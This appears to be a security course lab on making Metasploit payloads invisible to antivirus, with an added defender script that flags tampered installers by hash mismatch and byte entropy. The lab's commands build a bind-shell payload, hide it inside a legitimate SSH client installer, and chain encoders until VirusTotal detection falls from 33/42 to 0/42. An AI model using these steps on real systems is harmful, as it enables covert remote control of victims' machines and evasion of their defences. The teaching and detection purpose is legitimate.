What You Need
- A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.
WARNING
We are using some harmless test files, but don't infect people with any real viruses--that's a crime!

Purpose
Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.

Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won't spread, but it is detected by antivirus engines. In BackTrack, in a Terminal window, execute these commands:

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file listed.
Analyzing the Listener with VirusTotal
In BackTrack, click Applications, Internet, "Firefox Web Browser". In Firefox, go to https://www.virustotal.com/
Click the "Choose File" button. Navigate to /root and double-click the listen.exe file. "listen.exe" appears in the "Choose File" box.
In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Saving the Screen Image
Make sure the result is visible, showing something like "Detection rate: 33/42", as shown above. Save a screen capture with a filename of "Proj 6xa from YOUR NAME".

Encoding the Listener
This process will encode the listener and insert it into an innocent SSH client installer. In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*

You should see the evil_ssh.exe file listed.
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/ Click the "Choose File" button. Navigate to /root and double-click the evil_ssh.exe file. In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it.
Encoding the Listener Again
This process will encode the listener with several different encoders in sequence, as recommended by Keith Burton (Thanks!). In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*

You should see several listen files listed.
Analyzing the Encoded Listener with VirusTotal
In Firefox, go to https://www.virustotal.com/ Click the "Choose File" button. Navigate to /root and double-click the listen5.exe file. In the VirusTotal web page, click the "Scan It!" button.
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--0 out of 42, when I did it.
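The 0/42 result shows the limit of signature matching, not the limit of detection. Two properties of the file built in this lab survive every encoder pass: the -x/-k step changes the installer, so its hash no longer matches the one the vendor publishes, and an encoded payload is near-random data, so the region holding it has much higher byte entropy than the installer's own code and resources. The following Python script is an added example for defenders and is not part of the original lab or of Metasploit; it runs both checks offline on constructed stand-in data. The window size, the 7.0 bits/byte threshold and the "known good" hash are assumptions chosen for the example, not values from the page.

```python
"""Defender-side checks for a trojanized installer (added example, not the lab's code).

It does not use Metasploit or VirusTotal. It runs two host-side checks that do
not depend on an antivirus signature for the payload:

  1. SHA-256 comparison against the hash the vendor publishes for the installer
     (inserting anything into the file changes the hash).
  2. A Shannon-entropy scan over fixed windows: encoders such as shikata_ga_nai
     produce near-random bytes, so a window scoring close to 8 bits/byte is
     worth a second look.

All inputs are constructed stand-ins, not the real SSH installer or evil_ssh.exe.
"""
import hashlib
import math
import random
from collections import Counter

WINDOW = 1024          # bytes per entropy window (assumption: a tuning knob)
HIGH_ENTROPY = 7.0     # bits/byte threshold (assumption); encoded data usually scores > 7


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def max_window_entropy(data: bytes, window: int = WINDOW) -> tuple[float, int]:
    """Highest entropy over non-overlapping windows, with the offset where it occurs."""
    best, best_off = 0.0, 0
    for off in range(0, len(data), window):
        e = shannon_entropy(data[off:off + window])
        if e > best:
            best, best_off = e, off
    return best, best_off


def check_file(data: bytes, expected_sha256: str) -> dict:
    """Combine the hash check and the entropy scan into one verdict record."""
    peak, off = max_window_entropy(data)
    return {
        "hash_matches": sha256_hex(data) == expected_sha256,
        "entropy_whole": round(shannon_entropy(data), 3),
        "entropy_peak": round(peak, 3),
        "entropy_peak_offset": off,
        "high_entropy_region": peak >= HIGH_ENTROPY,
    }


# Constructed samples: plain text stands in for a normal installer, and
# deterministic pseudo-random bytes stand in for an encoded payload.
BENIGN_INSTALLER = b"SSH Secure Shell Client 3.2.9 setup stub - sample text only\n" * 200
_rng = random.Random(2482)                       # fixed seed so runs are repeatable
ENCODED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
TAMPERED_INSTALLER = BENIGN_INSTALLER + ENCODED_BLOB
KNOWN_GOOD_SHA256 = sha256_hex(BENIGN_INSTALLER)  # stand-in for the vendor-published hash

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_INSTALLER), ("tampered", TAMPERED_INSTALLER)):
        print(name, check_file(blob, KNOWN_GOOD_SHA256))
```

On the benign sample the hash matches and every window stays far below the threshold; on the tampered sample the hash fails and the peak window (located inside the appended blob) scores close to 8 bits/byte. A real installer contains compressed resources that also score high, so the entropy flag is a triage signal to pair with the hash check, not a verdict on its own.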